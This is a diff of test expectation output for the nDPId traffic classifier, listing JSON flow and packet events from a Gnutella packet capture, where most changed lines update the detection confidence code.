+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":131671,"flow_last_seen":251736,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":320290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320290,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4TFkAAIARXF4KAAIPdqgPR3AJ5EoAJEU1rxgxAkijNFD\/98wlZJR4AwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5034,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":2,"flow_last_seen":320290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320290,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4bmsAAIARqKcKAAIPdPGionAJ4kkAJCDgNOsxArkJ75n\/2X37nQtxAwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5035,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":2,"flow_last_seen":320290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320290,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4R1AAAIARd9IKAAIPdqf43HAJ56gAJBG+sRMxAjM8jgr\/OCOtVAIyAwABAAUAAADDglFLQA=="} 
@@ -2741,59 +2741,59 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":320292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320292,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4CAEAAIARw78KAAIPcHfybnAJ6ecAJJt6ZMkxArsJiWn\/2NtEIIr3AwABAAUAAADDglFLQA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4sK0AAIARXRsKAAIPMjruo3AJGcIAJO3IbAsxAnYtXYL\/8bz\/pBe7AwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA419wAAIARwSYKAAIPTL1I5nAJH+EAJBtk6eoxAtFG13r\/NLEu9DR8AwABAAUAAADDglFLQA=="} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":90809,"flow_last_seen":139723,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":90809,"flow_last_seen":139723,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
